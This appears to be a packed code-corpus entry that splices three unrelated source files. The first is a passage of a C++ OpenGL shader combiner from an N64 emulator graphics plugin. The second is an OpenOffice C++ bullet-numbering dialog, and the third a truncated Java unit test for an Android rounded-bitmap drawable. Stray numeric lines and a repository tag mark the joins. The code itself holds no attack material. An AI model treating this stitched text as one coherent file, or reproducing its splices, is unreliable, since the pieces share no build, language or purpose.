COGLFragmentShaderCombiner::InitCombinerCycleCopy(void) { COGLColorCombiner::InitCombinerCycleCopy(); } void COGLFragmentShaderCombiner::InitCombinerCycleFill(void) { COGLColorCombiner::InitCombinerCycleFill(); } void COGLFragmentShaderCombiner::InitCombinerBlenderForSimpleTextureDraw(uint32_t tile) { COGLColorCombiner::InitCombinerBlenderForSimpleTextureDraw(tile); } #ifdef DEBUGGER void COGLFragmentShaderCombiner::DisplaySimpleMuxString(void) { COGLColorCombiner::DisplaySimpleMuxString(); } #endif COGL_FragmentProgramCombiner::COGL_FragmentProgramCombiner(CRender *pRender) : COGLColorCombiner4(pRender) { delete m_pDecodedMux; m_pDecodedMux = new DecodedMuxForPixelShader; m_bFragmentProgramIsSupported = true; m_AlphaRef = 0.0f; bAlphaTestState = false; bAlphaTestPreviousState = false; bFogState = false; bFogPreviousState = false; //Create shaders for fill and copy GLint success; GLuint vs,fs; copyProgram = glCreateProgram(); vs = glCreateShader(GL_VERTEX_SHADER); glShaderSource(vs,1,&vertexShader,NULL); glCompileShader(vs); glGetShaderiv(vs,GL_COMPILE_STATUS,&success); if(!success) { char log[1024]; glGetShaderInfoLog(vs,1024,NULL,log); printf("%s\n",log); } fs = glCreateShader(GL_FRAGMENT_SHADER); glShaderSource(fs,1,&fragmentCopy,NULL); glCompileShader(fs); glGetShaderiv(fs,GL_COMPILE_STATUS,&success); if(!success) { char log[1024]; glGetShaderInfoLog(fs,1024,NULL,log); printf("%s\n",log); } glAttachShader(copyProgram,vs); glAttachShader(copyProgram,fs); glBindAttribLocation(copyProgram,VS_TEXCOORD0,"aTexCoord0"); glBindAttribLocation(copyProgram,VS_POSITION,"aPosition"); glLinkProgram(copyProgram); copyAlphaLocation = glGetUniformLocation(copyProgram,"AlphaRef"); glGetProgramiv(copyProgram,GL_LINK_STATUS,&success); if(!success) { char log[1024]; glGetProgramInfoLog(copyProgram,1024,NULL,log); printf("%s\n",log); } glDeleteShader(fs); //Fill shader fs = glCreateShader(GL_FRAGMENT_SHADER); glShaderSource(fs,1,&fragmentFill,NULL); glCompileShader(fs); glGetShaderiv(fs,GL_COMPILE_STATUS,&success); if(!success) { char log[1024]; glGetShaderInfoLog(fs,1024,NULL,log); printf("%s\n",log); } fillProgram = glCreateProgram(); glAttachShader(fillProgram,vs); glAttachShader(fillProgram,fs); glBindAttribLocation(fillProgram,VS_POSITION,"aPosition"); glLinkProgram(fillProgram); fillColorLocation = glGetUniformLocation(fillProgram,"uColor"); glDeleteShader(fs); glDeleteShader(vs); } COGL_FragmentProgramCombiner::~COGL_FragmentProgramCombiner() { int size = m_vCompiledShaders.size(); for (int i=0; i<size; i++) { GLuint ID = m_vCompiledShaders[i].programID; glDeleteProgram(ID); m_vCompiledShaders[i].programID = 0; } m_vCompiledShaders.clear(); } bool COGL_FragmentProgramCombiner::Initialize(void) { m_bFragmentProgramIsSupported = true; return true; } void COGL_FragmentProgramCombiner::UseProgram(GLuint program) { if (program != currentProgram) { glUseProgram(program); currentProgram = program; } } void COGL_FragmentProgramCombiner::DisableCombiner(void) { } void COGL_FragmentProgramCombiner::InitCombinerCycleCopy(void) { m_pOGLRender->DisableMultiTexture(); m_pOGLRender->EnableTexUnit(0, true); UseProgram(copyProgram); glUniform1f(copyAlphaLocation,m_AlphaRef); glEnableVertexAttribArray(VS_POSITION); glEnableVertexAttribArray(VS_TEXCOORD0); glDisableVertexAttribArray(VS_COLOR); glDisableVertexAttribArray(VS_TEXCOORD1); glDisableVertexAttribArray(VS_FOG); COGLTexture* pTexture = g_textures[gRSP.curTile].m_pCOGLTexture; if( pTexture ) { m_pOGLRender->BindTexture(pTexture->m_dwTextureName, 0); m_pOGLRender->SetTexelRepeatFlags(gRSP.curTile); } } void COGL_FragmentProgramCombiner::InitCombinerCycleFill(void) { UseProgram(fillProgram); glUniform4f(fillColorLocation,((gRDP.fillColor>>16)&0xFF)/255.0f,((gRDP.fillColor>>8)&0xFF)/255.0f,((gRDP.fillColor)&0xFF)/255.0f,((gRDP.fillColor>>24)&0xFF)/255.0f); } #ifdef BGR_SHADER const char *muxToFP_Maps[][2] = { //color -- alpha {"vec3(0.0)", "0.0"}, //MUX_0 = 0, {"vec3(1.0)", "1.0"}, //MUX_1, {"comb.rgb", "comb.a"}, //MUX_COMBINED, {"t0.rgb", "t0.a"}, //MUX_TEXEL0, {"t1.rgb", "t1.a"}, //MUX_TEXEL1, {"PrimColor.rgb", "PrimColor.a"}, //MUX_PRIM, {"vShadeColor.rgb", "vShadeColor.a"}, //MUX_SHADE, {"EnvColor.rgb", "EnvColor.a"}, //MUX_ENV, {"comb.rgb", "comb.a"}, //MUX_COMBALPHA, {"t0.rgb", "t0.a"}, //MUX_T0_ALPHA, {"t1.rgb", "t1.a"}, //MUX_T1_ALPHA, {"PrimColor.rgb", "PrimColor.a"}, //MUX_PRIM_ALPHA, {"vShadeColor.rgb", "vShadeColor.a"}, //MUX_SHADE_ALPHA, {"EnvColor.rgb", "EnvColor.a"}, //MUX_ENV_ALPHA, {"EnvFrac.a", "EnvFrac.a"}, //MUX_LODFRAC, {"PrimFrac.a", "PrimFrac.a"}, //MUX_PRIMLODFRAC, {"vec3(1.0)", "1.0"}, //MUX_K5, {"vec3(1.0)", "1.0"}, //MUX_UNK, // Should not be used }; #else const char *muxToFP_Maps[][2] = { //color -- alpha {"vec3(0.0)", "0.0"}, //MUX_0 = 0, {"vec3(1.0)", "1.0"}, //MUX_1, {"comb.rgb", "comb.a"}, //MUX_COMBINED, {"t0.bgr", "t0.a"}, //MUX_TEXEL0, {"t1.bgr", "t1.a"}, //MUX_TEXEL1, {"PrimColor.rgb", "PrimColor.a"}, //MUX_PRIM, {"vShadeColor.rgb", "vShadeColor.a"}, //MUX_SHADE, {"EnvColor.rgb", "EnvColor.a"}, //MUX_ENV, {"comb.rgb", "comb.a"}, //MUX_COMBALPHA, {"t0.bgr", "t0.a"}, //MUX_T0_ALPHA, {"t1.bgr", "t1.a"}, //MUX_T1_ALPHA, {"PrimColor.rgb", "PrimColor.a"}, //MUX_PRIM_ALPHA, {"vShadeColor.rgb", "vShadeColor.a"}, //MUX_SHADE_ALPHA, {"EnvColor.rgb", "EnvColor.a"}, //MUX_ENV_ALPHA, {"EnvFrac.a", "EnvFrac.a"}, //MUX_LODFRAC, {"PrimFrac.a", "PrimFrac.a"}, //MUX_PRIMLODFRAC, {"vec3(1.0)", "1.0"}, //MUX_K5, {"vec3(1.0)", "1.0"}, //MUX_UNK, // Should not be used }; #endif char oglNewFP[4092]; char* MuxToOC(uint8_t val) { // For color channel if( val&MUX_ALPHAREPLICATE ) return (char*)muxToFP_Maps[val&0x1F][1]; else return (char*)muxToFP_Maps[val&0x1F][0]; } char* MuxToOA(uint8_t val) { // For alpha channel return (char*)muxToFP_Maps[val&0x1F][1]; } static void CheckFpVars(uint8_t MuxVar, bool &bNeedT0, bool &bNeedT1) { MuxVar &= 0x1f; if (MuxVar == MUX_TEXEL0 || MuxVar == MUX_T0_ALPHA) bNeedT0 = true; if (MuxVar == MUX_TEXEL1 || MuxVar == MUX_T1_ALPHA) bNeedT1 = true; } void COGL_FragmentProgramCombiner::GenerateProgramStr() { DecodedMuxForPixelShader &mux = *(DecodedMuxForPixelShader*)m_pDecodedMux; mux.splitType[0] = mux.splitType[1] = mux.splitType[2] = mux.splitType[3] = CM_FMT_TYPE_NOT_CHECKED; m_pDecodedMux->Reformat(false); char tempstr[500], newFPBody[4092]; bool bNeedT0 = false, bNeedT1 = false, bNeedComb2 = false; newFPBody[0] = 0; for( int cycle=0; cycle<2; cycle++ ) { for( int channel=0; channel<2; channel++) { char* (*func)(uint8_t) = channel==0?MuxToOC:MuxToOA; char *dst = channel==0?(char*)"rgb":(char*)"a"; N64CombinerType &m = mux.m_n64Combiners[cycle*2+channel]; switch( mux.splitType[cycle*2+channel] ) { case CM_FMT_TYPE_NOT_USED: tempstr[0] = 0; break; case CM_FMT_TYPE_D: sprintf(tempstr, "comb.%s = %s;\n", dst, func(m.d)); CheckFpVars(m.d, bNeedT0, bNeedT1); break; case CM_FMT_TYPE_A_MOD_C: sprintf(tempstr, "comb.%s = %s * %s;\n", dst, func(m.a), func(m.c)); CheckFpVars(m.a, bNeedT0, bNeedT1); CheckFpVars(m.c, bNeedT0, bNeedT1); break; case CM_FMT_TYPE_A_ADD_D: sprintf(tempstr, "comb.%s = saturate(%s + %s);\n", dst, func(m.a), func(m.d)); CheckFpVars(m.a, bNeedT0, bNeedT1); CheckFpVars(m.d, bNeedT0, bNeedT1); break; case CM_FMT_TYPE_A_SUB_B: sprintf(tempstr, "comb.%s = %s - %s;\n", dst, func(m.a), func(m.b)); CheckFpVars(m.a, bNeedT0, bNeedT1); CheckFpVars(m.b, bNeedT0, bNeedT1); break; case CM_FMT_TYPE_A_MOD_C_ADD_D: sprintf(tempstr, "comb.%s = saturate(%s * %s + %s);\n", dst, func(m.a), func(m.c),func(m.d)); CheckFpVars(m.a, bNeedT0, bNeedT1); CheckFpVars(m.c, bNeedT0, bNeedT1); CheckFpVars(m.d, bNeedT0, bNeedT1); break; case CM_FMT_TYPE_A_LERP_B_C: //ARB ASM LERP and mix have different parameter ordering. //sprintf(tempstr, "comb.%s = saturate(mix(%s, %s, %s));\n", dst,func(m.a),func(m.b), func(m.c)); sprintf(tempstr, "comb.%s = (%s - %s) * %s + %s;\n", dst,func(m.a),func(m.b), func(m.c),func(m.b)); CheckFpVars(m.a, bNeedT0, bNeedT1); CheckFpVars(m.b, bNeedT0, bNeedT1); CheckFpVars(m.c, bNeedT0, bNeedT1); //sprintf(tempstr, "SUB comb.%s, %s, %s;\nMAD_SAT comb.%s, comb, %s, %s;\n", dst, func(m.a), func(m.b), dst, func(m.c), func(m.b)); break; default: sprintf(tempstr, "comb2.%s = %s - %s;\ncomb.%s = saturate(comb2.%s * %s + %s);\n", dst, func(m.a), func(m.b), dst,dst, func(m.c),func(m.d)); CheckFpVars(m.a, bNeedT0, bNeedT1); CheckFpVars(m.b, bNeedT0, bNeedT1); CheckFpVars(m.c, bNeedT0, bNeedT1); CheckFpVars(m.d, bNeedT0, bNeedT1); bNeedComb2 = true; break; } strcat(newFPBody, tempstr); } } oglNewFP[0] = 0; if (bNeedT0) strcat(oglNewFP, "#define NEED_TEX0\n"); if (bNeedT1) strcat(oglNewFP, "#define NEED_TEX1\n"); strcat(oglNewFP, fragmentHeader); strcat(oglNewFP, newFPBody); strcat(oglNewFP, fragmentFooter); } int COGL_FragmentProgramCombiner::ParseDecodedMux() { OGLShaderCombinerSaveType res; GLint success; if(vertexProgram == 9999) { vertexProgram = res.vertexShaderID = glCreateShader(GL_VERTEX_SHADER); glShaderSource(res.vertexShaderID, 1, &vertexShader,NULL); glCompileShader(res.vertexShaderID); } else { res.vertexShaderID = vertexProgram; } //Create 4 shaders, with and without alphatest + with and without fog GenerateProgramStr(); for(int alphaTest = 0;alphaTest < 2;alphaTest++) { for(int fog = 0; fog < 2; fog++) { res.fragmentShaderID = glCreateShader(GL_FRAGMENT_SHADER); char* tmpShader = (char*)malloc(sizeof(char) * 4096); strcpy(tmpShader,"#version " GLSL_VERSION "\n"); if(alphaTest == 1) strcat(tmpShader,"#define ALPHA_TEST\n"); if(fog == 1) strcat(tmpShader,"#define FOG\n"); res.fogIsUsed = fog == 1; res.alphaTest = alphaTest == 1; strcat(tmpShader,oglNewFP); glShaderSource(res.fragmentShaderID, 1,(const char**) &tmpShader,NULL); free(tmpShader); glCompileShader(res.fragmentShaderID); glGetShaderiv(res.fragmentShaderID, GL_COMPILE_STATUS, &success); if (!success) { char Log[1024]; GLint nLength; glGetShaderInfoLog(res.fragmentShaderID, 1024, &nLength, Log); printf("Error compiling shader!\n %s",oglNewFP); printf("%s", Log); } res.programID = glCreateProgram(); glAttachShader(res.programID,res.vertexShaderID); glAttachShader(res.programID,res.fragmentShaderID); //Bind Attributes glBindAttribLocation(res.programID,VS_COLOR,"aColor"); glBindAttribLocation(res.programID,VS_TEXCOORD0,"aTexCoord0"); glBindAttribLocation(res.programID,VS_TEXCOORD1,"aTexCoord1"); glBindAttribLocation(res.programID,VS_POSITION,"aPosition"); glBindAttribLocation(res.programID,VS_FOG,"aFogCoord"); glLinkProgram(res.programID); glGetProgramiv(res.programID, GL_LINK_STATUS, &success); if (!success) { char Log[1024]; GLint nLength; glGetShaderInfoLog(res.fragmentShaderID, 1024, &nLength, Log); printf("Error linking program!\n"); printf("%s\n",Log); } UseProgram(res.programID); //Bind texture samplers GLint tex0 = glGetUniformLocation(res.programID,"uTex0"); GLint tex1 = glGetUniformLocation(res.programID,"uTex1"); if(tex0 != -1) glUniform1i(tex0,0); if(tex1 != -1) glUniform1i(tex1,1); //Bind Uniforms res.PrimColorLocation = glGetUniformLocation(res.programID,"PrimColor"); res.EnvColorLocation = glGetUniformLocation(res.programID,"EnvColor"); res.PrimFracLocation = glGetUniformLocation(res.programID,"PrimFrac"); res.EnvFracLocation = glGetUniformLocation(res.programID,"EnvFrac"); res.AlphaRefLocation = glGetUniformLocation(res.programID,"AlphaRef"); res.FogColorLocation = glGetUniformLocation(res.programID,"FogColor"); res.FogMinMaxLocation = glGetUniformLocation(res.programID,"FogMinMax"); res.dwMux0 = m_pDecodedMux->m_dwMux0; res.dwMux1 = m_pDecodedMux->m_dwMux1; m_vCompiledShaders.push_back(res); } } m_lastIndex = m_vCompiledShaders.size()-4; return m_lastIndex; } void COGL_FragmentProgramCombiner::GenerateCombinerSetting(int index) { GLuint ID = m_vCompiledShaders[index].programID; UseProgram(ID); glEnableVertexAttribArray(VS_POSITION); glVertexAttribPointer(VS_POSITION,4,GL_FLOAT,GL_FALSE,sizeof(float)*5,&(g_vtxProjected5[0][0])); glEnableVertexAttribArray(VS_TEXCOORD0); glVertexAttribPointer(VS_TEXCOORD0,2,GL_FLOAT,GL_FALSE, sizeof( TLITVERTEX ), &(g_vtxBuffer[0].tcord[0].u)); glEnableVertexAttribArray(VS_TEXCOORD1); glVertexAttribPointer(VS_TEXCOORD1,2,GL_FLOAT,GL_FALSE, sizeof( TLITVERTEX ), &(g_vtxBuffer[0].tcord[1].u)); glEnableVertexAttribArray(VS_COLOR); glVertexAttribPointer(VS_COLOR, 4, GL_UNSIGNED_BYTE,GL_TRUE, sizeof(uint8_t)*4, &(g_oglVtxColors[0][0]) ); glEnableVertexAttribArray(VS_FOG); glVertexAttribPointer(VS_FOG, 1, GL_FLOAT,GL_FALSE, sizeof(float)*5, &(g_vtxProjected5[0][4]) ); } void COGL_FragmentProgramCombiner::GenerateCombinerSettingConstants(int index) { OGLShaderCombinerSaveType &prog = m_vCompiledShaders[index]; UseProgram(prog.programID); float *pf; if(prog.EnvColorLocation != -1) { pf = GetEnvColorfv(); if (memcmp(pf, prog.EnvColors, sizeof(prog.EnvColors))) { memcpy(prog.EnvColors, pf, sizeof(prog.EnvColors)); glUniform4fv(prog.EnvColorLocation, 1, pf); } } if(prog.PrimColorLocation != -1) { pf = GetPrimitiveColorfv(); if (memcmp(pf, prog.PrimColors, sizeof(prog.PrimColors))) { memcpy(prog.PrimColors, pf, sizeof(prog.PrimColors)); glUniform4fv(prog.PrimColorLocation, 1, pf); } } if(prog.EnvFracLocation != -1) { // avoid slow float compare.. if( *(int *)&gRDP.LODFrac != *(int *)&prog.EnvLODFrac ) { float frac = gRDP.LODFrac / 255.0f; float tempf[4] = {frac,frac,frac,frac}; prog.EnvLODFrac = (float)gRDP.LODFrac; glUniform4fv(prog.EnvFracLocation, 1, tempf); } } if(prog.PrimFracLocation != -1) { if( *(int *)&gRDP.primLODFrac != *(int *)&prog.PrimLODFrac ) { float frac2 = gRDP.primLODFrac / 255.0f; float tempf2[4] = {frac2,frac2,frac2,frac2}; prog.PrimLODFrac = (float)gRDP.primLODFrac; glUniform4fv(prog.PrimFracLocation, 1, tempf2); } } if(prog.FogColorLocation != -1) { pf = &gRDP.fvFogColor[0]; if (memcmp(pf, prog.FogColors, sizeof(prog.FogColors))) { memcpy(prog.FogColors, pf, sizeof(prog.FogColors)); glUniform4fv(prog.FogColorLocation, 1, pf); } } if(prog.FogMinMaxLocation != -1) { if( gRSPfFogMin != prog.FogMin || gRSPfFogMax != prog.FogMax ) { prog.FogMin = gRSPfFogMin; prog.FogMax = gRSPfFogMax; glUniform2f(prog.FogMinMaxLocation,gRSPfFogMin,gRSPfFogMax); } } if(prog.AlphaRefLocation != -1) { if( m_AlphaRef != prog.AlphaRef ) { prog.AlphaRef = m_AlphaRef; glUniform1f(prog.AlphaRefLocation, m_AlphaRef); } } } int COGL_FragmentProgramCombiner::FindCompiledMux() { #ifdef DEBUGGER if( debuggerDropCombiners ) { m_vCompiledShaders.clear(); //m_dwLastMux0 = m_dwLastMux1 = 0; debuggerDropCombiners = false; } #endif for( uint32_t i=0; i<m_vCompiledShaders.size(); i++ ) { if( m_vCompiledShaders[i].dwMux0 == m_pDecodedMux->m_dwMux0 && m_vCompiledShaders[i].dwMux1 == m_pDecodedMux->m_dwMux1 && m_vCompiledShaders[i].fogIsUsed == bFogState && m_vCompiledShaders[i].alphaTest == bAlphaTestState) { return (int)i; } } return -1; } ////////////////////////////////////////////////////////////////////////// void COGL_FragmentProgramCombiner::InitCombinerCycle12(void) { #ifdef DEBUGGER if( debuggerDropCombiners ) { UpdateCombiner(m_pDecodedMux->m_dwMux0,m_pDecodedMux->m_dwMux1); m_vCompiledShaders.clear(); m_dwLastMux0 = m_dwLastMux1 = 0; debuggerDropCombiners = false; } #endif m_pOGLRender->EnableMultiTexture(); bool combinerIsChanged = false; if( m_pDecodedMux->m_dwMux0 != m_dwLastMux0 || m_pDecodedMux->m_dwMux1 != m_dwLastMux1 || bAlphaTestState != bAlphaTestPreviousState || bFogState != bFogPreviousState || m_lastIndex < 0 ) { combinerIsChanged = true; m_lastIndex = FindCompiledMux(); if( m_lastIndex < 0 ) // Can not found { m_lastIndex = ParseDecodedMux(); } m_dwLastMux0 = m_pDecodedMux->m_dwMux0; m_dwLastMux1 = m_pDecodedMux->m_dwMux1; bAlphaTestPreviousState = bAlphaTestState; bFogPreviousState = bFogState; m_AlphaRef = (float)(m_pOGLRender->m_dwAlpha) / 255.0f; } GenerateCombinerSettingConstants(m_lastIndex); if( m_bCycleChanged || combinerIsChanged || gRDP.texturesAreReloaded || gRDP.colorsAreReloaded ) { if( m_bCycleChanged || combinerIsChanged ) { GenerateCombinerSettingConstants(m_lastIndex); GenerateCombinerSetting(m_lastIndex); } else if( gRDP.colorsAreReloaded ) { GenerateCombinerSettingConstants(m_lastIndex); } m_pOGLRender->SetAllTexelRepeatFlag(); gRDP.colorsAreReloaded = false; gRDP.texturesAreReloaded = false; } else { m_pOGLRender->SetAllTexelRepeatFlag(); } } #ifdef DEBUGGER void COGL_FragmentProgramCombiner::DisplaySimpleMuxString(void) { COGLColorCombiner::DisplaySimpleMuxString(); DecodedMuxForPixelShader &mux = *(DecodedMuxForPixelShader*)m_pDecodedMux; mux.Reformat(false); GenerateProgramStr(); //sprintf(oglNewFP, oglFP, // MuxToOC(mux.aRGB0), MuxToOC(mux.bRGB0), MuxToOC(mux.cRGB0), MuxToOC(mux.dRGB0), // MuxToOA(mux.aA0), MuxToOA(mux.bA0), MuxToOA(mux.cA0), MuxToOA(mux.dA0), // MuxToOC(mux.aRGB1), MuxToOC(mux.bRGB1), MuxToOC(mux.cRGB1), MuxToOC(mux.dRGB1), // MuxToOA(mux.aA1), MuxToOA(mux.bA1), MuxToOA(mux.cA1), MuxToOA(mux.dA1) // ); TRACE0("OGL Fragment Program:"); TRACE0(oglNewFP); } #endif
16,539
679
<reponame>Grosskopf/openoffice /************************************************************** * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * *************************************************************/ // MARKER(update_precomp.py): autogen include statement, do not remove #include "precompiled_sd.hxx" #ifdef SD_DLLIMPLEMENTATION #undef SD_DLLIMPLEMENTATION #endif #include "OutlineBulletDlg.hxx" #ifndef _SVX_SVXIDS_HRC #include <svx/svxids.hrc> #endif #include <sfx2/objsh.hxx> #include <svx/drawitem.hxx> #include <editeng/bulitem.hxx> #include <editeng/eeitem.hxx> #include <editeng/numitem.hxx> #include <svx/dialogs.hrc> #include <svl/intitem.hxx> #include <svx/svdmark.hxx> #include "View.hxx" #include <svx/svdobj.hxx> #include <svl/style.hxx> #include <drawdoc.hxx> #ifndef _SD_SDRESID_HXX #include "sdresid.hxx" #endif #include "glob.hrc" #include "dlgolbul.hrc" #include "bulmaper.hxx" #include "DrawDocShell.hxx" #include <svx/svxids.hrc> #include <svl/aeitem.hxx> namespace sd { /************************************************************************* |* |* Konstruktor des Tab-Dialogs: Fuegt die Seiten zum Dialog hinzu |* \************************************************************************/ OutlineBulletDlg::OutlineBulletDlg( ::Window* pParent, const SfxItemSet* pAttr, ::sd::View* pView ) : SfxTabDialog ( pParent, SdResId(TAB_OUTLINEBULLET) ), aInputSet ( *pAttr ), bTitle ( sal_False ), pSdView ( pView ) { FreeResource(); aInputSet.MergeRange( SID_PARAM_NUM_PRESET, SID_PARAM_CUR_NUM_LEVEL ); aInputSet.Put( *pAttr ); pOutputSet = new SfxItemSet( *pAttr ); pOutputSet->ClearItem(); sal_Bool bOutliner = sal_False; // Sonderbehandlung wenn eine Title Objekt selektiert wurde if( pView ) { const SdrMarkList& rMarkList = pView->GetMarkedObjectList(); const sal_uLong nCount = rMarkList.GetMarkCount(); for(sal_uLong nNum = 0; nNum < nCount; nNum++) { SdrObject* pObj = rMarkList.GetMark(nNum)->GetMarkedSdrObj(); if( pObj->GetObjInventor() == SdrInventor ) { switch(pObj->GetObjIdentifier()) { case OBJ_TITLETEXT: bTitle = sal_True; break; case OBJ_OUTLINETEXT: bOutliner = sal_True; break; } } } } if( SFX_ITEM_SET != aInputSet.GetItemState(EE_PARA_NUMBULLET)) { const SvxNumBulletItem *pItem = NULL; if(bOutliner) { SfxStyleSheetBasePool* pSSPool = pView->GetDocSh()->GetStyleSheetPool(); String aStyleName((SdResId(STR_LAYOUT_OUTLINE))); aStyleName.AppendAscii( RTL_CONSTASCII_STRINGPARAM( " 1" ) ); SfxStyleSheetBase* pFirstStyleSheet = pSSPool->Find( aStyleName, SD_STYLE_FAMILY_PSEUDO); if( pFirstStyleSheet ) pFirstStyleSheet->GetItemSet().GetItemState(EE_PARA_NUMBULLET, sal_False, (const SfxPoolItem**)&pItem); } if( pItem == NULL ) pItem = (SvxNumBulletItem*) aInputSet.GetPool()->GetSecondaryPool()->GetPoolDefaultItem(EE_PARA_NUMBULLET); DBG_ASSERT( pItem, "Kein EE_PARA_NUMBULLET im Pool! [CL]" ); aInputSet.Put(*pItem, EE_PARA_NUMBULLET); } /* debug if( SFX_ITEM_SET == aInputSet.GetItemState(EE_PARA_NUMBULLET, sal_False, &pItem )) { SvxNumRule& rItem = *((SvxNumBulletItem*)pItem)->GetNumRule(); for( int i = 0; i < 9; i++ ) { SvxNumberFormat aNumberFormat = rItem.GetLevel(i); } } */ if(bTitle && aInputSet.GetItemState(EE_PARA_NUMBULLET,sal_True) == SFX_ITEM_ON ) { SvxNumBulletItem* pItem = (SvxNumBulletItem*)aInputSet.GetItem(EE_PARA_NUMBULLET,sal_True); SvxNumRule* pRule = pItem->GetNumRule(); if(pRule) { SvxNumRule aNewRule( *pRule ); aNewRule.SetFeatureFlag( NUM_NO_NUMBERS, sal_True ); SvxNumBulletItem aNewItem( aNewRule, EE_PARA_NUMBULLET ); aInputSet.Put(aNewItem); } } SetInputSet( &aInputSet ); if(!bTitle) AddTabPage(RID_SVXPAGE_PICK_SINGLE_NUM); else RemoveTabPage( RID_SVXPAGE_PICK_SINGLE_NUM ); AddTabPage( RID_SVXPAGE_PICK_BULLET ); AddTabPage( RID_SVXPAGE_PICK_BMP ); AddTabPage(RID_SVXPAGE_NUM_OPTIONS ); AddTabPage(RID_SVXPAGE_NUM_POSITION ); } OutlineBulletDlg::~OutlineBulletDlg() { delete pOutputSet; } void OutlineBulletDlg::PageCreated( sal_uInt16 nId, SfxTabPage &rPage ) { switch ( nId ) { case RID_SVXPAGE_NUM_OPTIONS: { if( pSdView ) { FieldUnit eMetric = pSdView->GetDoc()->GetUIUnit(); SfxAllItemSet aSet(*(GetInputSetImpl()->GetPool())); aSet.Put ( SfxAllEnumItem(SID_METRIC_ITEM,(sal_uInt16)eMetric)); rPage.PageCreated(aSet); } } break; case RID_SVXPAGE_NUM_POSITION: { if( pSdView ) { FieldUnit eMetric = pSdView->GetDoc()->GetUIUnit(); SfxAllItemSet aSet(*(GetInputSetImpl()->GetPool())); aSet.Put ( SfxAllEnumItem(SID_METRIC_ITEM,(sal_uInt16)eMetric)); rPage.PageCreated(aSet); } } break; } } const SfxItemSet* OutlineBulletDlg::GetOutputItemSet() const { SfxItemSet aSet( *SfxTabDialog::GetOutputItemSet() ); pOutputSet->Put( aSet ); const SfxPoolItem *pItem = NULL; if( SFX_ITEM_SET == pOutputSet->GetItemState(pOutputSet->GetPool()->GetWhich(SID_ATTR_NUMBERING_RULE), sal_False, &pItem )) { SdBulletMapper::MapFontsInNumRule( *((SvxNumBulletItem*)pItem)->GetNumRule(), *pOutputSet ); /* #i35937# SfxUInt16Item aBulletState( EE_PARA_BULLETSTATE, 1 ); pOutputSet->Put(aBulletState); */ } /* #i35937# SdBulletMapper::PostMapNumBulletForDialog( *pOutputSet ); */ if(bTitle && pOutputSet->GetItemState(EE_PARA_NUMBULLET,sal_True) == SFX_ITEM_ON ) { SvxNumBulletItem* pBulletItem = (SvxNumBulletItem*)pOutputSet->GetItem(EE_PARA_NUMBULLET,sal_True); SvxNumRule* pRule = pBulletItem->GetNumRule(); if(pRule) pRule->SetFeatureFlag( NUM_NO_NUMBERS, sal_False ); } return pOutputSet; } } // end of namespace sd
2,793
18,965
/* * Copyright (c) Facebook, Inc. and its affiliates. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. */ package com.facebook.drawee.drawable; import static org.junit.Assert.*; import static org.mockito.Mockito.*; import android.content.res.Resources; import android.graphics.Bitmap; import android.graphics.ColorFilter; import android.graphics.Paint; import android.graphics.drawable.BitmapDrawable; import android.graphics.drawable.Drawable; import android.util.DisplayMetrics; import org.junit.Before; import org.junit.Test; import org.junit.runner.RunWith; import org.robolectric.RobolectricTestRunner; @RunWith(RobolectricTestRunner.class) public class RoundedBitmapDrawableTest { private Resources mResources; private Bitmap mBitmap; private DisplayMetrics mDisplayMetrics; RoundedBitmapDrawable mRoundedBitmapDrawable; RoundedBitmapDrawable mRoundedBitmapDrawableWithNullBitmap; private final Drawable.Callback mCallback = mock(Drawable.Callback.class); @Before public void setUp() { mResources = mock(Resources.class); mBitmap = mock(Bitmap.class); mDisplayMetrics = mock(DisplayMetrics.class); when(mResources.getDisplayMetrics()).thenReturn(mDisplayMetrics); mRoundedBitmapDrawable = new RoundedBitmapDrawable(mResources, mBitmap); mRoundedBitmapDrawable.setCallback(mCallback); mRoundedBitmapDrawableWithNullBitmap = new RoundedBitmapDrawable(mResources, null); mRoundedBitmapDrawable.setCallback(mCallback); } @Test public void testSetCircle() { mRoundedBitmapDrawable.setCircle(true); verify(mCallback).invalidateDrawable(mRoundedBitmapDrawable); assertTrue(mRoundedBitmapDrawable.isCircle()); } @Test public void testSetRadii() { mRoundedBitmapDrawable.setRadii(new float[] {1, 2, 3, 4, 5, 6, 7, 8}); verify(mCallback).invalidateDrawable(mRoundedBitmapDrawable); assertArrayEquals(new float[] {1, 2, 3, 4, 5, 6, 7, 8}, mRoundedBitmapDrawable.getRadii(), 0); } @Test public void testSetRadius() { mRoundedBitmapDrawable.setRadius(9); verify(mCallback).invalidateDrawable(mRoundedBitmapDrawable); assertArrayEquals(new float[] {9, 9, 9, 9, 9, 9, 9, 9}, mRoundedBitmapDrawable.getRadii(), 0); } @Test public void testSetBorder() { int color = 0x12345678; float width = 5; mRoundedBitmapDrawable.setBorder(color, width); verify(mCallback).invalidateDrawable(mRoundedBitmapDrawable); assertEquals(color, mRoundedBitmapDrawable.getBorderColor()); assertEquals(width, mRoundedBitmapDrawable.getBorderWidth(), 0); } @Test public void testSetPadding() { float padding = 10; mRoundedBitmapDrawable.setPadding(padding); verify(mCallback).invalidateDrawable(mRoundedBitmapDrawable); assertEquals(padding, mRoundedBitmapDrawable.getPadding(), 0); } @Test public void testSetScaleDownInsideBorders() { mRoundedBitmapDrawable.setScaleDownInsideBorders(true); verify(mCallback).invalidateDrawable(mRoundedBitmapDrawable); assertTrue(mRoundedBitmapDrawable.getScaleDownInsideBorders()); } @Test public void testSetPaintFilterBitmap() { mRoundedBitmapDrawable.setPaintFilterBitmap(true); verify(mCallback).invalidateDrawable(mRoundedBitmapDrawable); assertTrue(mRoundedBitmapDrawable.getPaintFilterBitmap()); } @Test public void testShouldRoundDefault() { assertFalse(mRoundedBitmapDrawable.shouldRound()); assertFalse(mRoundedBitmapDrawableWithNullBitmap.shouldRound()); } @Test public void testShouldRoundRadius() { mRoundedBitmapDrawable.setRadius(5); assertTrue(mRoundedBitmapDrawable.shouldRound()); mRoundedBitmapDrawable.setRadius(0); assertFalse(mRoundedBitmapDrawable.shouldRound()); mRoundedBitmapDrawableWithNullBitmap.setRadius(5); assertFalse(mRoundedBitmapDrawableWithNullBitmap.shouldRound()); 